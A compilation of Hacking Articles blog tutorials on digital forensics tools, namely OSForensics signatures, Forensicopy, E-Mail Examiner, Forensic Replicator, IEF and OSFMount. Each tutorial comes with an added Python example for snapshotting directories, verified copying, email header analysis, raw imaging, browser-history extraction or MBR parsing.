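The create-then-compare procedure above, as an added example in Python (not OSForensics' own signature format): create_signature walks a directory and records each file's path, size, attributes and modification time, which is what the post says a signature holds, and additionally a SHA-256 so that a content change which keeps size and mtime is still caught. compare_signatures then reports added, deleted and modified files and which recorded fields changed. The JSON signature file layout and the sample tree are this example's assumptions.

```python
"""Directory signature: snapshot a tree, then diff two snapshots to list added,
deleted and modified files. Added example, not OSForensics' own signature file
format. Besides path, size and attributes it records a SHA-256, so a content
change that keeps size and timestamps is still caught (that addition is this
example's, not documented OSForensics behaviour)."""
import hashlib
import json
import os
import tempfile


def sha256_file(path, block=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(block), b""):
            h.update(chunk)
    return h.hexdigest()


def create_signature(root):
    """Return {relative path: {size, mode, mtime, sha256}} for every file under root."""
    sig = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.stat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            sig[rel] = {
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o777),
                "mtime": int(st.st_mtime),
                "sha256": sha256_file(full),
            }
    return sig


def save_signature(sig, path):
    with open(path, "w") as fh:
        json.dump(sig, fh, indent=1, sort_keys=True)


def load_signature(path):
    with open(path) as fh:
        return json.load(fh)


def compare_signatures(old, new):
    """Diff two signatures; 'modified' means any recorded field changed."""
    common = set(old) & set(new)
    changed = {p: [k for k in old[p] if old[p][k] != new[p][k]]
               for p in common if old[p] != new[p]}
    return {
        "added": sorted(set(new) - set(old)),
        "deleted": sorted(set(old) - set(new)),
        "modified": sorted(changed),
        "changed_fields": changed,
    }


def demo():
    """Create, modify, re-create and compare on a constructed sample tree."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "H")            # stands in for the H: pen drive
        os.makedirs(os.path.join(root, "docs"))
        a = os.path.join(root, "docs", "a.txt")
        with open(a, "wb") as fh:
            fh.write(b"AAAA")
        with open(os.path.join(root, "old.bin"), "wb") as fh:
            fh.write(b"\x00" * 8)
        save_signature(create_signature(root), os.path.join(tmp, "old.sig"))

        st = os.stat(a)
        with open(a, "wb") as fh:                # same size, one byte differs
            fh.write(b"AAAB")
        os.utime(a, ns=(st.st_atime_ns, st.st_mtime_ns))   # put the mtime back
        os.remove(os.path.join(root, "old.bin"))
        with open(os.path.join(root, "new.log"), "wb") as fh:
            fh.write(b"x")
        save_signature(create_signature(root), os.path.join(tmp, "new.sig"))

        return compare_signatures(load_signature(os.path.join(tmp, "old.sig")),
                                  load_signature(os.path.join(tmp, "new.sig")))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

In the demo the edited file keeps its size and its original mtime, so only the hash field changes; that is the case a size-and-attribute signature alone would miss.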

Author: Mukul Mohan

The post How to identify any Suspicious changes to files or directory (Disk Drive Signature) appeared first on Hacking Articles.


How to Preserve Forensics Image file Timestamp


Forensicopy is designed to copy evidence files from one location to another while maintaining the original timestamps (MAC times). It also hashes every file before and after the copy and verifies that the file was copied accurately. An extensive log file is generated during the copy process to support the chain of custody.

Please note:

Forensicopy is designed to copy evidence files. It is not a substitute for a forensic image. If possible you should always create a full forensic drive image; only where that is not possible should you fall back to a forensic copy with a tool like Forensicopy.

First, copy a file from one location to another with an ordinary copy: the copied file's timestamps change.

As you will see below.

For a forensic copy the timestamps must remain the same, so we use the Forensicopy tool instead.

In Forensicopy, browse to the file (or folder) to be copied as the source directory.

Browse to the destination folder and click Start.

A message confirms that the copy has completed and asks whether the log file should be exported.

Now check the properties of the copied file: its timestamps are unchanged.

After the log file has been created, open it. It records the start and finish time of the copy and the source and destination of every file in that folder, together with the timestamps, which remain the same.
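The behaviour described above, as an added example (not Forensicopy code or its log format): forensic_copy walks a source folder, hashes each file, copies it, restores the original access and modify times on the copy, re-hashes and records everything in a JSON log. The demo first shows that a plain copy loses the original mtime, which is the problem the post opens with. The sample evidence file, its 2020 timestamp and the log layout are constructed for the example. One caveat a practitioner should know: portable Python can restore access and modify times but not the Windows creation time, which a dedicated tool handles through platform APIs.

```python
"""Forensically copy a folder: hash every file before and after, restore the
original access/modify times on the copy, verify, and write a chain-of-custody
log. Added example modelled on what the post says Forensicopy does; not
Forensicopy's code or its log format."""
import datetime
import hashlib
import json
import os
import shutil
import tempfile


def sha256_file(path, block=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(block), b""):
            h.update(chunk)
    return h.hexdigest()


def utcnow():
    return datetime.datetime.now(datetime.timezone.utc).isoformat()


def forensic_copy(src_dir, dst_dir, log_path):
    """Copy src_dir into dst_dir; returns the log entries (also written to log_path)."""
    entries = []
    for dirpath, _dirs, files in os.walk(src_dir):
        for name in files:
            src = os.path.join(dirpath, name)
            rel = os.path.relpath(src, src_dir)
            dst = os.path.join(dst_dir, rel)
            os.makedirs(os.path.dirname(dst), exist_ok=True)
            st = os.stat(src)
            entry = {"source": src, "destination": dst, "start": utcnow(),
                     "sha256_before": sha256_file(src)}
            shutil.copyfile(src, dst)           # raw copy: the copy's mtime is now 'now'
            # Put back access/modify time at nanosecond precision. Creation time
            # is not settable from portable Python; a dedicated tool uses platform
            # APIs for that.
            os.utime(dst, ns=(st.st_atime_ns, st.st_mtime_ns))
            entry["sha256_after"] = sha256_file(dst)
            entry["finish"] = utcnow()
            entry["hash_verified"] = entry["sha256_before"] == entry["sha256_after"]
            entry["mtime_preserved"] = os.stat(dst).st_mtime_ns == st.st_mtime_ns
            entries.append(entry)
    with open(log_path, "w") as fh:
        json.dump(entries, fh, indent=1)
    return entries


def demo():
    """Constructed sample: one evidence file dated 2020-01-01.
    Returns (did a naive copy change the mtime?, forensic copy log entries)."""
    with tempfile.TemporaryDirectory() as tmp:
        src, naive, dst = (os.path.join(tmp, d) for d in ("src", "naive", "dst"))
        os.makedirs(os.path.join(src, "sub"))
        evidence = os.path.join(src, "sub", "ledger.xlsx")
        with open(evidence, "wb") as fh:
            fh.write(b"PK\x03\x04" + b"\x00" * 100)
        old = int(datetime.datetime(2020, 1, 1, tzinfo=datetime.timezone.utc).timestamp())
        os.utime(evidence, (old, old))

        os.makedirs(naive)                       # ordinary copy for comparison
        shutil.copyfile(evidence, os.path.join(naive, "ledger.xlsx"))
        naive_changed = int(os.stat(os.path.join(naive, "ledger.xlsx")).st_mtime) != old

        entries = forensic_copy(src, dst, os.path.join(tmp, "copy.log.json"))
        return naive_changed, entries


if __name__ == "__main__":
    changed, log = demo()
    print("naive copy changed mtime:", changed)
    print(json.dumps(log, indent=1))
```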

Author: Mukul Mohan

The post How to Preserve Forensics Image file Timestamp appeared first on Hacking Articles.

Outlook Forensics Investigation using E-Mail Examiner


Paraben's E-Mail Examiner forensically examines a wide range of email formats, including Outlook (PST and OST), Thunderbird, Outlook Express, Windows Mail and more, and is one of the most comprehensive forensically sound email examination tools available. It lets you analyze message headers, bodies and attachments, and it does not stop at messages sitting in the Deleted Items folder: it also recovers messages that were deleted from Deleted Items.

  • Microsoft Outlook (PST)
  • Microsoft Outlook Offline Storage (OST)
  • America On-line (AOL)
  • The Bat! (version 3.x and higher)
  • Thunderbird
  • Outlook Express
  • Eudora
  • Email file: RFC 822 compliant (EML)
  • Windows mail databases
  • Maildir
  • Plain Text mail
  • Support for more than 750 MIME Types

First download E-Mail Examiner from here and install it on your examination workstation (never on the suspect's machine, which would alter the evidence). Open E-Mail Examiner and click the 'Create a New Case' option.

The New Case window opens. Click Next to proceed.

In the next step enter the case name (DEMO here) and a description, then click Finish.

Next enter the investigator's name and email details and click Finish.

You are then asked for a file name under which to save the case in the location of your choice. Click Save.

Now select MS Outlook Image as the source type to add the Outlook image as evidence.

Select the Outlook image file and click Open.

Tick both options and click OK to proceed.

The case DEMO is now created and shows the directory hierarchy of the Outlook image. From here you can analyze message headers, bodies and attachments.
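Header, body and attachment analysis on a single RFC 822 (EML) message, as an added example that is not E-Mail Examiner code. It walks the Received chain in chronological order (relays prepend their header, so the last Received header is the first hop), extracts the originating IP and the transit time across hops, and hashes each attachment while checking whether its leading bytes match the type the sender declared. SAMPLE_EML is constructed: hosts, addresses and the message are fictitious, and the attachment claims to be a PDF but carries a PE header.

```python
"""Parse an RFC 822/EML message: Received chain in chronological order, origin IP,
transit time, attachment hashes and a declared-type vs content check. Added
example, not E-Mail Examiner code. SAMPLE_EML is constructed."""
import hashlib
import re
from email import policy
from email.parser import BytesParser
from email.utils import parsedate_to_datetime

SAMPLE_EML = b"""\
Received: from mail.example.com (mail.example.com [203.0.113.5])
    by mx.example.net with ESMTP id 7f3a; Mon, 02 Mar 2020 10:15:07 +0000
Received: from [198.51.100.7] (unknown [198.51.100.7])
    by mail.example.com with ESMTPA; Mon, 02 Mar 2020 10:15:02 +0000
From: "Alice" <alice@example.com>
To: bob@example.net
Subject: Invoice attached
Date: Mon, 02 Mar 2020 10:15:00 +0000
Message-ID: <abc123@example.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain; charset="utf-8"

Please see the attached invoice.
--B1
Content-Type: application/pdf; name="invoice.pdf"
Content-Disposition: attachment; filename="invoice.pdf"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--B1--
"""

HOP_RE = re.compile(r"from\s+(?P<src>\S+).*?\bby\s+(?P<dst>\S+)", re.S)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Split one Received header into from/by hosts, bracketed IP and timestamp."""
    head, _, date = str(value).rpartition(";")
    m = HOP_RE.search(head)
    ip = IP_RE.search(head)
    return {"from": m.group("src") if m else None,
            "by": m.group("dst") if m else None,
            "ip": ip.group(1) if ip else None,
            "time": parsedate_to_datetime(date.strip())}


def analyze(raw: bytes):
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    # Each relay prepends its own Received header: reverse to get chronological order.
    hops = [parse_received(v) for v in reversed(msg.get_all("Received", []))]
    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        attachments.append({
            "name": part.get_filename(),
            "declared_type": part.get_content_type(),
            "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest(),
            "magic": data[:4].hex(),
            "looks_executable": data.startswith(b"MZ") or data.startswith(b"\x7fELF"),
        })
    return {
        "message_id": str(msg["Message-ID"]),
        "from": str(msg["From"]),
        "subject": str(msg["Subject"]),
        "origin_ip": hops[0]["ip"] if hops else None,
        "hops": hops,
        "transit_seconds": (hops[-1]["time"] - hops[0]["time"]).total_seconds() if len(hops) > 1 else 0.0,
        "attachments": attachments,
    }


if __name__ == "__main__":
    r = analyze(SAMPLE_EML)
    print("origin IP:", r["origin_ip"], "transit:", r["transit_seconds"], "s")
    for h in r["hops"]:
        print(f"  {h['time'].isoformat()}  {h['from']} -> {h['by']}")
    for a in r["attachments"]:
        print(f"  attachment {a['name']} declared {a['declared_type']} magic {a['magic']} "
              f"executable={a['looks_executable']} sha256={a['sha256'][:16]}...")
```

Only the Received header added by your own MX is trustworthy; earlier hops are text written by whoever controlled the previous server, so treat the origin IP as a lead to corroborate against server logs rather than as proof.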

Author: Mukul Mohan

The post Outlook Forensics Investigation using E-Mail Examiner appeared first on Hacking Articles.

How to Create Drive Image for Forensic Purpose using Forensic Replicator


Forensic Replicator is a Windows-based bit-stream imaging tool that creates bit-by-bit raw DD images of hard drives and related media. Images can also be created in the PFR format, which lets you encrypt the image, compress it, or break it into smaller pieces. Forensic Replicator offers everything you would expect from a forensic imaging tool.

 Features

  • Drive to Drive image option
  • Creates bit-stream images of removable media, partitions, or an entire physical hard drive
  • Creates images of USB micro drives
  • Explore function that previews active FAT files, with tree and detail views
  • Allows for reprocessing of image files from Raw to Split or add compression as a new image file
  • Compresses image files on the fly
  • Encrypts image data (128-bit) for secure storage of evidence
  • Splits images into segments for portability
  • Generates self-extracting images
  • Formats and copies DMF/1.68 MB floppy
  • Creates ISO CD-ROM images and allows immediate browsing of data
  • Automates floppy imaging with convenient Batch Assistant mode

First download Forensic Replicator from here and install it.

Click the File menu and select Create Physical Drive Image.

The Creating Physical Drive Image wizard opens. Click Next.

Now choose the suspect's evidence drive that you want to image. Attach the suspect drive through a hardware write blocker (or otherwise ensure it is read-only) so that the acquisition itself cannot alter the evidence.

Browse to the location and enter the name of the physical image file to create. Select the option to save in raw format and click Next.

Select the report format (Text, HTML or XML) and the information to include in the report: image information, time and date of acquisition, exported partition structure and a report header. Click Next.

Enter the case details such as case number, evidence number and company/agency, then click Finish.

You are asked for a file name; enter it, select the folder where the report should be saved and click Save.

The raw image is now created.
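What a raw dd-style acquisition like the one above does under the hood, as an added example that is not Forensic Replicator code or its PFR format: image_device reads the source read-only block by block, hashes every byte as it streams past, writes the bytes either to one .dd file or to numbered fixed-size segments, re-hashes what was written, and produces a report with the acquisition times and both hashes. The segment naming, the report layout and the 10,000-byte "device" in the demo are constructed for the example; on a real system the source would be a device node such as /dev/sdb.

```python
"""Raw dd-style imaging: read a source device (or a file standing in for one)
block by block, hash on the fly, optionally split the output into fixed-size
segments, re-hash the written segments and produce an acquisition report.
Added example; not Forensic Replicator code or its PFR format."""
import datetime
import hashlib
import json
import os
import tempfile


def _hash_files(paths, block):
    h = hashlib.sha256()
    for p in paths:
        with open(p, "rb") as fh:
            for chunk in iter(lambda: fh.read(block), b""):
                h.update(chunk)
    return h.hexdigest()


def image_device(device, out_prefix, segment_bytes=None, block=1 << 20):
    """Image `device` to out_prefix.dd, or to out_prefix.001, .002 ... when
    segment_bytes is set. Returns the acquisition report as a dict."""
    started = datetime.datetime.now(datetime.timezone.utc).isoformat()
    h = hashlib.sha256()
    segments, total, written = [], 0, 0
    out = None

    def next_segment():
        nonlocal out, written
        if out:
            out.close()
        name = f"{out_prefix}.{len(segments) + 1:03d}" if segment_bytes else f"{out_prefix}.dd"
        out = open(name, "wb")
        segments.append(name)
        written = 0

    with open(device, "rb") as src:        # read-only: the source is never opened for writing
        next_segment()
        for chunk in iter(lambda: src.read(block), b""):
            h.update(chunk)
            total += len(chunk)
            view = memoryview(chunk)
            while len(view):
                if segment_bytes and written >= segment_bytes:
                    next_segment()
                room = len(view) if not segment_bytes else min(len(view), segment_bytes - written)
                out.write(view[:room])
                written += room
                view = view[room:]
    out.close()

    report = {
        "source": device,
        "bytes_acquired": total,
        "sha256_source": h.hexdigest(),
        "sha256_image": _hash_files(segments, block),   # independent re-read of the output
        "segments": segments,
        "acquisition_start": started,
        "acquisition_finish": datetime.datetime.now(datetime.timezone.utc).isoformat(),
    }
    report["verified"] = report["sha256_source"] == report["sha256_image"]
    with open(out_prefix + ".report.json", "w") as fh:
        json.dump(report, fh, indent=1)
    return report


def demo():
    """Image a constructed 10,000-byte 'device' into 4 KiB segments.
    Returns (report, sha256 of the sample data, segment sizes)."""
    data = bytes(range(256)) * 39 + b"\xff" * 16        # 9984 + 16 = 10000 bytes
    with tempfile.TemporaryDirectory() as tmp:
        dev = os.path.join(tmp, "sdb")
        with open(dev, "wb") as fh:
            fh.write(data)
        report = image_device(dev, os.path.join(tmp, "evidence01"),
                              segment_bytes=4096, block=1000)
        sizes = [os.path.getsize(s) for s in report["segments"]]
        return report, hashlib.sha256(data).hexdigest(), sizes


if __name__ == "__main__":
    rep, expected, sizes = demo()
    print("segments:", sizes, "verified:", rep["verified"], rep["sha256_source"] == expected)
```

The second hash is computed by re-reading the written segments rather than reusing the in-memory digest, so it actually tests the output on disk; a block size that does not divide the segment size is deliberately used in the demo to exercise the segment boundary logic.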

Author: Mukul Mohan

The post How to Create Drive Image for Forensic Purpose using Forensic Replicator appeared first on Hacking Articles.

Forensics Investigation of Facebook, Skype, and Browsers in RAW Image using IEF (Internet Evidence Finder)


Internet Evidence Finder (IEF) is designed to find Internet-related data and files on a hard drive or image as part of a digital forensics investigation. Despite the breadth of what it searches for, its interface is simple.

Features

  • Browser Activity
  • Instant Messaging
  • Chat Apps
  • Social Networking
  • P2P File Sharing
  • Web Search
  • Search Toolbar
  • Media Files
  • Webmail
  • Cloud Drive Mapping

First download IEF from here, install it and open it. Click Images.

Select the image file to load and click Open.

The image file is listed. Click Next.

Click OK.

The location and search type are shown. Click Next.

Select the items (artifact categories) to be investigated and click Next.

Click Browse to select the destination folder, enter the case name, case number and examiner's name, and click Find Evidence.

The processing status is now displayed.

After processing completes, the IEF report viewer opens. Click Facebook URLs to list every Facebook URL found, with date and time.

Clicking Google Analytics URLs shows each URL with its page title and host name.

Clicking Google Search shows the search URLs together with the original search query.

Selecting Skype Chat Messages shows each message and its identifier.

Selecting Facebook Chat shows the recovered Facebook chat messages.

Selecting Facebook Status Updates shows the recovered status updates.

Clicking any of the browser activity options, such as Opera or 360 Safe Browser, shows that browser's history.

Selecting IE InPrivate/Recovery URLs shows Internet Explorer history, including pages visited in InPrivate mode that survive in recovery files.
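How the browser-history and Google-search artifacts above are recovered, as an added example that is not IEF code: a Chrome/Chromium History file is a SQLite database whose urls table stores last_visit_time as microseconds since 1601-01-01 UTC (the WebKit epoch), and the original query of a Google search survives in the q= parameter of the URL. extract opens the database read-only, converts the timestamps, recovers the query and buckets Facebook URLs; build_sample_db constructs a minimal History file with only the columns this needs (Chrome's real schema has more). The URLs and times in the sample are constructed.

```python
"""Pull web activity out of a Chrome/Chromium History database: convert WebKit
timestamps, recover the original query from Google search URLs and bucket
Facebook URLs. Added example, not IEF code; the History file is constructed."""
import datetime
import os
import sqlite3
import tempfile
from urllib.parse import parse_qs, urlparse

UTC = datetime.timezone.utc
WEBKIT_EPOCH = datetime.datetime(1601, 1, 1, tzinfo=UTC)


def webkit_to_datetime(us):
    """Chrome stores last_visit_time as microseconds since 1601-01-01 UTC."""
    return WEBKIT_EPOCH + datetime.timedelta(microseconds=us)


def datetime_to_webkit(dt):
    # Integer arithmetic: values of ~1.3e16 exceed exact float precision.
    td = dt - WEBKIT_EPOCH
    return (td.days * 86400 + td.seconds) * 1_000_000 + td.microseconds


def classify(url):
    """Return (artifact category, original search query or None)."""
    p = urlparse(url)
    host = p.hostname or ""
    if host == "facebook.com" or host.endswith(".facebook.com"):
        return "facebook_url", None
    if host.endswith("google.com") and p.path == "/search":
        q = parse_qs(p.query).get("q")
        return "google_search", (q[0] if q else None)
    return "browser_history", None


def extract(history_db):
    """Read the urls table of a History file (read-only) and classify each row."""
    con = sqlite3.connect(f"file:{history_db}?mode=ro", uri=True)   # never write to evidence
    try:
        rows = con.execute(
            "SELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time").fetchall()
    finally:
        con.close()
    out = []
    for url, title, ts in rows:
        category, query = classify(url)
        out.append({"category": category, "url": url, "title": title,
                    "query": query, "visited": webkit_to_datetime(ts).isoformat()})
    return out


def build_sample_db(path):
    """Constructed History file with a minimal urls table (assumption: real Chrome
    schemas carry more columns, but these are the ones the extraction uses)."""
    base = datetime.datetime(2020, 3, 2, 10, 0, tzinfo=UTC)
    rows = [
        ("https://www.google.com/search?q=how+to+wipe+a+hard+drive&oq=how",
         "how to wipe a hard drive - Google Search", 1),
        ("https://www.facebook.com/messages/t/100012345", "Messenger", 2),
        ("https://example.org/docs", "Docs", 3),
    ]
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url LONGVARCHAR, "
                "title LONGVARCHAR, visit_count INTEGER, typed_count INTEGER, "
                "last_visit_time INTEGER NOT NULL, hidden INTEGER)")
    con.executemany(
        "INSERT INTO urls (url, title, visit_count, typed_count, last_visit_time, hidden) "
        "VALUES (?, ?, 1, 0, ?, 0)",
        [(u, t, datetime_to_webkit(base + datetime.timedelta(minutes=m))) for u, t, m in rows])
    con.commit()
    con.close()


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        db = os.path.join(tmp, "History")
        build_sample_db(db)
        return extract(db)


if __name__ == "__main__":
    for row in demo():
        print(row["visited"], row["category"], row["query"] or row["url"])
```

Work on a copy of the History file taken from the image, not on a live profile: a running browser holds the database locked and may still have unflushed entries in its write-ahead log.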

Author: Mukul Mohan

The post Forensics Investigation of Facebook, Skype, and Browsers in RAW Image using IEF (Internet Evidence Finder) appeared first on Hacking Articles.

How to Mount RAW Image and ISO Image as a Drive using OSF Mount


OSFMount allows you to mount local disk image files (bit-for-bit copies of a disk or partition) in Windows under a drive letter. You can then analyze the image with PassMark OSForensics, or any other tool, simply by pointing it at the mounted drive letter. Keep the default read-only mount so that nothing you run against the mounted volume can alter the evidence image.

Before mounting, open My Computer and note the physical and removable drives present, so the mounted image is easy to spot afterwards.

First download OSFMount from here, install it on your examination workstation, open OSFMount and click the Mount new button.

Load the evidence disk image by clicking Browse and selecting the image file.

The mounted image is now listed in OSFMount.

Open My Computer again: the mounted image appears as an additional drive.
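What a mount tool has to work out before it can expose a volume inside a whole-disk raw image, as an added example that is not OSFMount code: the MBR in sector 0 holds four 16-byte partition entries, each giving the partition type, starting LBA and length in sectors, and the byte offset of a partition is simply starting LBA times sector size. That offset is exactly what a Linux loop mount needs (mount -o ro,loop,offset=N), so mount_command builds that line read-only. The sample MBR is constructed; disks using GPT carry a single protective 0xEE entry here and need a GPT parser instead, which this example only detects.

```python
"""Parse the MBR of a raw image, list partitions and compute the byte offset each
starts at, which is what a read-only loop mount needs. Added example, not OSFMount
code. The sample MBR is constructed."""
import struct

SECTOR = 512
PARTITION_TYPES = {
    0x05: "Extended", 0x07: "NTFS/exFAT", 0x0B: "FAT32", 0x0C: "FAT32 (LBA)",
    0x0F: "Extended (LBA)", 0x82: "Linux swap", 0x83: "Linux", 0xEE: "GPT protective",
}
# status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
ENTRY = struct.Struct("<B3xB3xII")


def parse_mbr(sector0, sector_size=SECTOR):
    """Parse the first 512 bytes of an image; returns a list of partition dicts."""
    if len(sector0) < 512 or sector0[510:512] != b"\x55\xaa":
        raise ValueError("no 0x55AA boot signature: not an MBR (or not sector 0)")
    parts = []
    for i in range(4):
        status, ptype, lba_start, sectors = ENTRY.unpack_from(sector0, 446 + 16 * i)
        if ptype == 0:                      # empty slot
            continue
        parts.append({
            "index": i + 1,
            "bootable": status == 0x80,
            "type": ptype,
            "type_name": PARTITION_TYPES.get(ptype, f"0x{ptype:02x}"),
            "lba_start": lba_start,
            "sectors": sectors,
            "offset_bytes": lba_start * sector_size,
            "size_bytes": sectors * sector_size,
            "is_gpt_protective": ptype == 0xEE,
        })
    return parts


def read_mbr(image_path):
    """Read sector 0 of a raw image file or device and parse it."""
    with open(image_path, "rb") as fh:
        return parse_mbr(fh.read(512))


def mount_command(image_path, part, mountpoint="/mnt/evidence"):
    """Linux loop-mount line for one partition: read-only, no access-time updates."""
    return (f"mount -o ro,noatime,loop,offset={part['offset_bytes']} "
            f"{image_path} {mountpoint}")


def build_sample_mbr():
    """Constructed MBR: a bootable NTFS partition at LBA 2048, then a Linux partition."""
    mbr = bytearray(512)
    mbr[446:462] = ENTRY.pack(0x80, 0x07, 2048, 204800)
    mbr[462:478] = ENTRY.pack(0x00, 0x83, 206848, 409600)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


if __name__ == "__main__":
    for p in parse_mbr(build_sample_mbr()):
        print(f"#{p['index']} {p['type_name']:<15} start LBA {p['lba_start']:>8} "
              f"offset {p['offset_bytes']:>12} bytes size {p['size_bytes']:>12} bytes")
        print("   ", mount_command("evidence01.dd", p))
```

The 512-byte sector size is an assumption that holds for most images; for a 4Kn drive pass sector_size=4096, or the offsets will be wrong by a factor of eight.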

Author: Mukul Mohan

The post How to Mount RAW Image and ISO Image as a Drive using OSF Mount appeared first on Hacking Articles.
